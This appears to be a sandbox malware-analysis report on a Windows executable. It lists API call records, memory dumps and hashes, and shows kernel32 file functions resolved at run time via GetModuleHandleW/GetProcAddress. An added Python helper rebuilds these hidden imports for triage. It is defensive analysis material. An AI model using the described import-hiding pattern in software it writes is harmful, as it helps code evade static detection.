                                                                                                                                                                          • Opcode ID: 2eb86a0f909ee0a4fbea53a7bd0c4ed67e9ebd44417d8eb743df5a9b25001909
                                                                                                                                                                          • Instruction ID: 520e5987ffc208b54da3ed1a303307f8dff03029e77857e9b0c388558b2bc5c2
                                                                                                                                                                          • Opcode Fuzzy Hash: 2eb86a0f909ee0a4fbea53a7bd0c4ed67e9ebd44417d8eb743df5a9b25001909
                                                                                                                                                                          • Instruction Fuzzy Hash: 15217870504605EFDB10CF68D948B99BBF5FF08304F11816EF9499B6A1C374AA94CB98
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          APIs
                                                                                                                                                                          • GetModuleHandleW.KERNEL32(kernel32.dll,FindNextFileW,00000000,00000000), ref: 0045636C
                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 00456373
                                                                                                                                                                          • GetModuleHandleW.KERNEL32(kernel32.dll,FindNextFileA), ref: 004563A9
                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 004563B0
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AddressHandleModuleProc
                                                                                                                                                                          • String ID: FindNextFileA$FindNextFileW$kernel32.dll$hE
                                                                                                                                                                          • API String ID: 1646373207-2121118663
                                                                                                                                                                          • Opcode ID: aa2722dac122cd8750b97d7bcf507d6cee1a5f10d67d6f0523148c5f646c930a
                                                                                                                                                                          • Instruction ID: 7a136b3481172b3f0d0a27c7db2885ae56c4f78afd8c083977c64a7b4bf7837f
                                                                                                                                                                          • Opcode Fuzzy Hash: aa2722dac122cd8750b97d7bcf507d6cee1a5f10d67d6f0523148c5f646c930a
                                                                                                                                                                          • Instruction Fuzzy Hash: E9118632600525AB8B10FFA49D49ABF73E89B48756B55006AFC09D3282DB78DE488B59
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          APIs
                                                                                                                                                                          • __EH_prolog3_GS.LIBCMT ref: 004561C7
                                                                                                                                                                          • GetModuleHandleW.KERNEL32(kernel32.dll,FindFirstFileW,00000254,00455824), ref: 004561E3
                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 004561E6
                                                                                                                                                                          • GetModuleHandleW.KERNEL32(kernel32.dll,FindFirstFileA), ref: 00456226
                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 00456229
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AddressHandleModuleProc$H_prolog3_
                                                                                                                                                                          • String ID: FindFirstFileA$FindFirstFileW$kernel32.dll
                                                                                                                                                                          • API String ID: 762132516-163559883
                                                                                                                                                                          • Opcode ID: 3093ea68332e9f22e1d32dae94c75286150bfc6223ac29f77a4d3dbb62b0d123
                                                                                                                                                                          • Instruction ID: 988da93d2f6e90c525e9d2e1c97fe73c196047658258afb6c425bcd9891aaad1
                                                                                                                                                                          • Opcode Fuzzy Hash: 3093ea68332e9f22e1d32dae94c75286150bfc6223ac29f77a4d3dbb62b0d123
                                                                                                                                                                          • Instruction Fuzzy Hash: 54110831904124ABCB10FB69CC4DAAE3764AB44765F9502AAFC18A71C1DF389E49CB88
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          APIs
                                                                                                                                                                          • GetModuleHandleW.KERNEL32(kernel32.dll,CreateFileW,?,00000000,HsG,00438CE8,?,?,00000000,?,HsG,?,?,?,00000000,0045611E), ref: 004555B6
                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 004555B9
                                                                                                                                                                          • GetModuleHandleW.KERNEL32(kernel32.dll,CreateFileA,?,00000000,HsG,00438CE8,?,?,00000000,?,HsG,?,?,?,00000000,0045611E), ref: 004555EE
                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 004555F1
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
• Source File: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp
• Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp
• Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp
• Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp
• Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp
Similarity
• API ID: AddressHandleModuleProc
• String ID: CreateFileA$CreateFileW$HsG$kernel32.dll
• API String ID: 1646373207-726590994
• Opcode ID: 78f60f67d669c6fe22655b0590b2212f565ae337478ebddb22a5579241ec4567
• Instruction ID: 877a3ee708e1406f69b3fa5c016f0a783bed4bc64dfb2203590629ed6211b060
• Opcode Fuzzy Hash: 78f60f67d669c6fe22655b0590b2212f565ae337478ebddb22a5579241ec4567
• Instruction Fuzzy Hash: 1501407250060ABBCF115FA4DC54CBF3F2AFF08765714451AFE1956161CB3AC960DBA8
Uniqueness
Uniqueness Score: -1.00%

APIs
• __EH_prolog3.LIBCMT ref: 0045552E
• GetModuleHandleW.KERNEL32(kernel32.dll,CreateDirectoryW,00000000,00455D7E), ref: 0045554B
• GetProcAddress.KERNEL32(00000000), ref: 0045554E
• GetModuleHandleW.KERNEL32(kernel32.dll,CreateDirectoryA), ref: 00455573
• GetProcAddress.KERNEL32(00000000), ref: 00455576
Strings
Memory Dump Source
• Source File: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp
• Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp
• Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp
• Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp
• Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp
Similarity
• API ID: AddressHandleModuleProc$H_prolog3
• String ID: CreateDirectoryA$CreateDirectoryW$kernel32.dll
• API String ID: 1623054726-2917578371
• Opcode ID: 14105ab41adff66b7a10bd5c678ae01bb1f43cfe5929931af479134205201f8d
• Instruction ID: bb23eda88fbda8d4adcde135058bda2a16c2cd5ca5d101f142e661b59f5a49e7
• Opcode Fuzzy Hash: 14105ab41adff66b7a10bd5c678ae01bb1f43cfe5929931af479134205201f8d
• Instruction Fuzzy Hash: 9EF0A471200608BBCB10AF61CC99DAF3665EB44B51B91892EF809A7242DF7CDA44C7AC
Uniqueness
Uniqueness Score: -1.00%

APIs
• __EH_prolog3.LIBCMT ref: 0045917D
• GetModuleHandleW.KERNEL32(kernel32.dll,SetFileAttributesW,00000000,004556F5,0000000A,00000000), ref: 00459197
• GetProcAddress.KERNEL32(00000000), ref: 0045919A
• GetModuleHandleW.KERNEL32(kernel32.dll,SetFileAttributesA), ref: 004591C1
• GetProcAddress.KERNEL32(00000000), ref: 004591C4
Strings
Memory Dump Source
• Source File: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp
• Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp
• Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp
• Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp
• Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp
Similarity
• API ID: AddressHandleModuleProc$H_prolog3
• String ID: SetFileAttributesA$SetFileAttributesW$kernel32.dll
• API String ID: 1623054726-3589348009
• Opcode ID: 23a29bf3a17832be601d29b7d167d04d1e6c8ed2072776756cb96b300562f417
• Instruction ID: b556d46341c89ed7476d63b12a0adfd85d238b4bbed302006bbe537b1fc950c4
• Opcode Fuzzy Hash: 23a29bf3a17832be601d29b7d167d04d1e6c8ed2072776756cb96b300562f417
• Instruction Fuzzy Hash: FEF08131200619FBCB107F65CC09D9E3A65AF50751B96852BFC09A7251DF78DA44CB9C
Uniqueness
Uniqueness Score: -1.00%

APIs
• __EH_prolog3.LIBCMT ref: 0045650C
• GetModuleHandleW.KERNEL32(kernel32.dll,GetFileAttributesW,00000000,004557A3), ref: 00456526
• GetProcAddress.KERNEL32(00000000), ref: 00456529
• GetModuleHandleW.KERNEL32(kernel32.dll,GetFileAttributesA), ref: 0045654D
• GetProcAddress.KERNEL32(00000000), ref: 00456550
Strings
Memory Dump Source
• Source File: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp
• Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp
• Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp
• Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp
• Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp
Similarity
• API ID: AddressHandleModuleProc$H_prolog3
• String ID: GetFileAttributesA$GetFileAttributesW$kernel32.dll
• API String ID: 1623054726-1399581607
• Opcode ID: 4a076615c5b710e15969690bd60be9ee6e956a53f8ecada110a62555807d5cb1
• Instruction ID: 579ed438ac276a9961a9abae618d24a7f6f941623fdac6bb2ddf1edbb4c218b7
• Opcode Fuzzy Hash: 4a076615c5b710e15969690bd60be9ee6e956a53f8ecada110a62555807d5cb1
• Instruction Fuzzy Hash: 2DF0C871600205B7CB10BF71CC09A9E3654AF80B51792852FF809A7241DF7CC605C79C
Uniqueness
Uniqueness Score: -1.00%
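The four records above (CreateFile, CreateDirectory, SetFileAttributes, GetFileAttributes) share one shape: GetModuleHandleW("kernel32.dll") followed by GetProcAddress for the W variant, then the same pair for the A variant. None of those file APIs need to appear in the PE import table, which is what the "Contains functionality to dynamically determine API calls" signature keys on. The script below is an added triage helper, not part of the report or of the sample: it parses the report's own "APIs" lines (excerpted verbatim, with the ReadFile record as a negative case) and rebuilds the set of run-time-resolved imports. It assumes that the second argument the report prints for GetModuleHandleW is the lpProcName string sitting on the stack for the GetProcAddress call that follows; that assumption matches the String ID field of every record here.

```python
"""Rebuild the run-time-resolved import set from Joe Sandbox-style API records.

Added example for the report above; not the sandbox's code and not the sample's.
"""
import re
from collections import defaultdict

# Verbatim "APIs" lines from four function records in the report; the last
# record (ReadFile) resolves nothing and is included as a negative case.
REPORT_EXCERPT = """\
APIs
• __EH_prolog3.LIBCMT ref: 0045552E
• GetModuleHandleW.KERNEL32(kernel32.dll,CreateDirectoryW,00000000,00455D7E), ref: 0045554B
• GetProcAddress.KERNEL32(00000000), ref: 0045554E
• GetModuleHandleW.KERNEL32(kernel32.dll,CreateDirectoryA), ref: 00455573
• GetProcAddress.KERNEL32(00000000), ref: 00455576
Strings
APIs
• __EH_prolog3.LIBCMT ref: 0045917D
• GetModuleHandleW.KERNEL32(kernel32.dll,SetFileAttributesW,00000000,004556F5,0000000A,00000000), ref: 00459197
• GetProcAddress.KERNEL32(00000000), ref: 0045919A
• GetModuleHandleW.KERNEL32(kernel32.dll,SetFileAttributesA), ref: 004591C1
• GetProcAddress.KERNEL32(00000000), ref: 004591C4
Strings
APIs
• __EH_prolog3.LIBCMT ref: 0045650C
• GetModuleHandleW.KERNEL32(kernel32.dll,GetFileAttributesW,00000000,004557A3), ref: 00456526
• GetProcAddress.KERNEL32(00000000), ref: 00456529
• GetModuleHandleW.KERNEL32(kernel32.dll,GetFileAttributesA), ref: 0045654D
• GetProcAddress.KERNEL32(00000000), ref: 00456550
Strings
APIs
• __EH_prolog3_GS.LIBCMT ref: 0043E277
• _memset.LIBCMT ref: 0043E2A0
• ReadFile.KERNEL32(?,?,00000138,?,00000000), ref: 0043E2C3
• GetLastError.KERNEL32 ref: 0043E2CD
Memory Dump Source
"""

# One report line: "<api>.<LIB>(<args>), ref: <hex>" or "<api>.<LIB> ref: <hex>".
API_LINE = re.compile(
    r"^(?:•\s*)?(?P<api>[\w.]+?)\.(?P<lib>[A-Z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$"
)


def parse_records(text):
    """Split the excerpt at each 'APIs' header; a record is a list of
    (api, lib, args, call_site) tuples in the order the report lists them."""
    records, current = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":
            current = []
            records.append(current)
            continue
        m = API_LINE.match(line)
        if m and current is not None:
            args = m["args"].split(",") if m["args"] else []
            current.append((m["api"], m["lib"], args, int(m["ref"], 16)))
    return records


def resolved_procs(record):
    """Return [(module, proc, call_site)] for every GetModuleHandle call that
    is immediately followed by GetProcAddress. ASSUMPTION: the second printed
    argument of GetModuleHandle is the lpProcName the next GetProcAddress
    consumes (it matches the String ID field of each record in the report)."""
    out = []
    for i in range(len(record) - 1):
        api, _, args, ref = record[i]
        if (api in ("GetModuleHandleW", "GetModuleHandleA")
                and record[i + 1][0] == "GetProcAddress" and len(args) >= 2):
            out.append((args[0].lower(), args[1], ref))
    return out


def hidden_import_table(records):
    """Collapse resolved procs into 'module!BaseName' -> sorted variants, e.g.
    'kernel32.dll!CreateDirectory' -> ['A', 'W']. Both variants present means
    the function resolves the Unicode and the ANSI export (W first by call site)."""
    table = defaultdict(set)
    for rec in records:
        for module, proc, _ in resolved_procs(rec):
            base, variant = (proc[:-1], proc[-1]) if proc[-1] in "AW" else (proc, "")
            table[f"{module}!{base}"].add(variant)
    return {k: sorted(v) for k, v in table.items()}


def resolver_call_sites(records):
    """Call-site addresses of the first GetModuleHandle in each resolving
    function; these are the places to set breakpoints or emit YARA anchors."""
    return sorted(procs[0][2] for procs in map(resolved_procs, records) if procs)


if __name__ == "__main__":
    recs = parse_records(REPORT_EXCERPT)
    for name, variants in hidden_import_table(recs).items():
        print(f"{name:<40} variants={variants}")
    print("resolver call sites:", [hex(a) for a in resolver_call_sites(recs)])
```

The resulting table is the import list the static PE headers do not show; feed it into the same triage you would apply to a normal import table (file-system write, attribute tampering) and keep the call-site addresses for debugger breakpoints on the unpacked image. Whether the A lookup is a fallback for non-Unicode Windows or both pointers are kept cannot be read from the call list alone; only the order (W before A at every site) is visible here.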

APIs
• __EH_prolog3_GS.LIBCMT ref: 0043E277
• _memset.LIBCMT ref: 0043E2A0
• ReadFile.KERNEL32(?,?,00000138,?,00000000), ref: 0043E2C3
• GetLastError.KERNEL32 ref: 0043E2CD
• _memset.LIBCMT ref: 0043E36E
• ReadFile.KERNEL32(?,00000000,00000018,?,00000000), ref: 0043E38B
• _memset.LIBCMT ref: 0043E3DD
• ReadFile.KERNEL32(?,00000000,?,?,00000000), ref: 0043E3F7
• GetLastError.KERNEL32 ref: 0043E401
Memory Dump Source
• Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp
• Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp
• Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp
• Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp
• Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp
Similarity
• API ID: FileRead_memset$ErrorLast$H_prolog3_
• String ID:
• API String ID: 2677393532-0
• Opcode ID: fa483f4611888ab421b93dffb73c9f36681cf847687b27d0c4995cc2daf99527
• Instruction ID: 3118cc53abb2b50cd5bdc6bae3776db024a04edf275fc3e48fb7e4218d5ae2be
• Opcode Fuzzy Hash: fa483f4611888ab421b93dffb73c9f36681cf847687b27d0c4995cc2daf99527
• Instruction Fuzzy Hash: 23513AB5901618EBDB50DF65CC81ADEB7B8FF08314F4011AAF509E3291E734AA91CF69
Uniqueness
Uniqueness Score: -1.00%

APIs
• __EH_prolog3_GS.LIBCMT ref: 00430272
• GetDlgItemTextW.USER32(?,000003E8,?,00000064), ref: 004302C1
• GetDlgItem.USER32 ref: 004302CE
  • Part of subcall function 004301B4: wsprintfW.USER32 ref: 004301E3
  • Part of subcall function 004301B4: lstrcmpW.KERNEL32(?,?), ref: 004301F7
• EnableWindow.USER32(00000000), ref: 004302F1
• EndDialog.USER32(?,00000002), ref: 004302FC
• EndDialog.USER32(?,00000002), ref: 00430310
• GetDlgItem.USER32 ref: 00430326
• SetWindowTextW.USER32(?,-00000004), ref: 004303A3
• EnableWindow.USER32(00000000,00000000), ref: 004303BF
Memory Dump Source
• Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp
• Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp
• Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp
                                                                                                                                                                          • Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          • Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp Download File
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ItemWindow$DialogEnableText$H_prolog3_lstrcmpwsprintf
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 2161687695-0
                                                                                                                                                                          • Opcode ID: c11b07fb4e2316786f212a3facd00a7995038b04ea01408d2d35127a5b7204f0
                                                                                                                                                                          • Instruction ID: fd87fe56ddcb3b4ff6ccbb0735829bf1d2879eccf5f0b42d184dea51d1f05ce0
                                                                                                                                                                          • Opcode Fuzzy Hash: c11b07fb4e2316786f212a3facd00a7995038b04ea01408d2d35127a5b7204f0
                                                                                                                                                                          • Instruction Fuzzy Hash: 25310830640614ABE714EF60DC5AFAF3725AF19305F004266FE46A72D1EBB88E45CB6D
                                                                                                                                                                          Uniqueness

Uniqueness Score: -1.00%

APIs
• FindClose.KERNEL32(00000000), ref: 00456908
  • Part of subcall function 00402580: GetLastError.KERNEL32 ref: 0040259F
  • Part of subcall function 00402580: SetLastError.KERNEL32(?), ref: 004025CF
  • Part of subcall function 00401580: GetLastError.KERNEL32(00000000,00483E18,00405EB5), ref: 0040158F
  • Part of subcall function 00401580: SysFreeString.OLEAUT32(?), ref: 004015AB
  • Part of subcall function 00401580: SysFreeString.OLEAUT32(?), ref: 004015B6
  • Part of subcall function 00401580: SetLastError.KERNEL32(?), ref: 004015D4
• __EH_prolog3_GS.LIBCMT ref: 00456622
  • Part of subcall function 0040C384: __EH_prolog3.LIBCMT ref: 0040C38B
  • Part of subcall function 0040C384: GetLastError.KERNEL32(00000004,00433A61,?,00000000,00000004,0040EF8C,?,00000001), ref: 0040C3AD
  • Part of subcall function 0040C384: SetLastError.KERNEL32(?,00000000), ref: 0040C3ED
  • Part of subcall function 00455724: __EH_prolog3_GS.LIBCMT ref: 0045572E
  • Part of subcall function 004100B6: __EH_prolog3_GS.LIBCMT ref: 004100BD
  • Part of subcall function 004561BD: __EH_prolog3_GS.LIBCMT ref: 004561C7
  • Part of subcall function 004561BD: GetModuleHandleW.KERNEL32(kernel32.dll,FindFirstFileW,00000254,00455824), ref: 004561E3
  • Part of subcall function 004561BD: GetProcAddress.KERNEL32(00000000), ref: 004561E6
Strings
Memory Dump Source
• Source File: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp
• Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp
• Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp
• Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp
• Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp
Similarity
• API ID: ErrorLast$H_prolog3_$FreeString$AddressCloseFindH_prolog3HandleModuleProc
• String ID: *.*$HsG$HsG$HsG$HsG
• API String ID: 2006274578-1225694355
• Opcode ID: 8918d52ada21b167e46a545bcc20575e4bf1ad7964de139b8228515acf73f200
• Instruction ID: 1dd474b9d3d906389da787ddd456f26d5ddca9abeb7c66c366164bab47a44278
• Opcode Fuzzy Hash: 8918d52ada21b167e46a545bcc20575e4bf1ad7964de139b8228515acf73f200
• Instruction Fuzzy Hash: 9ED17071800218EBDF20DFA5CC55BDEBBB4AF15308F50409EE80967292DB795A89CF59
Uniqueness

Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp
• Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp
• Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp
• Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp
• Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp
Similarity
• API ID: ErrorLast_memsetwsprintf
• String ID: Referer: %s$dwplayer
• API String ID: 1359275013-1303060843
• Opcode ID: e31709d3bb09551a4ba733ee6102951959d8b764da79b813c73f30cc038f169d
• Instruction ID: e3bd5a7c1a9d1afb8a7d84a7a58966ad12226142b114bfca8ff89fbd602b2109
• Opcode Fuzzy Hash: e31709d3bb09551a4ba733ee6102951959d8b764da79b813c73f30cc038f169d
• Instruction Fuzzy Hash: BDC18D70A042989FDF20DF64C844BE9BBB5AF44348F1141DAE489E7291DBB89EC4CF58
Uniqueness

Uniqueness Score: -1.00%

APIs
• __EH_prolog3_GS.LIBCMT ref: 00423D80
• GetVersionExW.KERNEL32(?,000001FC,0042AD0E,00477284,?,00000000,00000001,00000000,00000000,dotnetfx.exe,?,00000001,isnetfx.exe,?,00000001,000001D4), ref: 00423DA1
• _wcscmp.LIBCMT ref: 00423DD4
• _wcscmp.LIBCMT ref: 00423F53
Strings
Memory Dump Source
• Source File: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp
• Associated: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp
• Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp
• Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp
• Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp
Similarity
• API ID: _wcscmp$H_prolog3_Version
• String ID: 0$HsG$dotnetfxsp1.exe
• API String ID: 158289-2839601481
• Opcode ID: ecd7b9e558f856dfceae397d46f02584ec0904e5d6ab654a70742477b02d1a6e
• Instruction ID: 02d9f5a144390a134f90cd795ecbddfc4b1a5f17212265e5c245f28dc841bedd
• Opcode Fuzzy Hash: ecd7b9e558f856dfceae397d46f02584ec0904e5d6ab654a70742477b02d1a6e
• Instruction Fuzzy Hash: 0551A071900229DADB20DBA5DD55BEEBB78AB11308F5040EFE409B3182DB780F89CF95
Uniqueness

Uniqueness Score: -1.00%

APIs
• __EH_prolog3_GS.LIBCMT ref: 0045572E
• GetLastError.KERNEL32 ref: 004557C3
• GetLastError.KERNEL32 ref: 00455882
• __CxxThrowException@8.LIBCMT ref: 004558F2
  • Part of subcall function 0040C384: __EH_prolog3.LIBCMT ref: 0040C38B
  • Part of subcall function 0040C384: GetLastError.KERNEL32(00000004,00433A61,?,00000000,00000004,0040EF8C,?,00000001), ref: 0040C3AD
  • Part of subcall function 0040C384: SetLastError.KERNEL32(?,00000000), ref: 0040C3ED
  • Part of subcall function 00455907: __EH_prolog3_catch_GS.LIBCMT ref: 00455911
  • Part of subcall function 00455907: __CxxThrowException@8.LIBCMT ref: 004559D0
Strings
Memory Dump Source
• Source File: 00000000.00000002.244989767.0000000000448000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.244437377.0000000000400000.00000002.00020000.sdmp
• Associated: 00000000.00000002.244531843.0000000000401000.00000080.00020000.sdmp
• Associated: 00000000.00000002.244913055.0000000000445000.00000040.00020000.sdmp
• Associated: 00000000.00000002.245349891.0000000000476000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245427646.000000000049D000.00000004.00020000.sdmp
• Associated: 00000000.00000002.245438721.000000000049E000.00000008.00020000.sdmp
• Associated: 00000000.00000002.245446793.00000000004A8000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245609186.00000000004D5000.00000002.00020000.sdmp
• Associated: 00000000.00000002.245666981.00000000004E5000.00000002.00020000.sdmp
Similarity
• API ID: ErrorLast$Exception@8Throw$H_prolog3H_prolog3_H_prolog3_catch_
• String ID: $HsG$HsG
• API String ID: 3135901474-3023446174
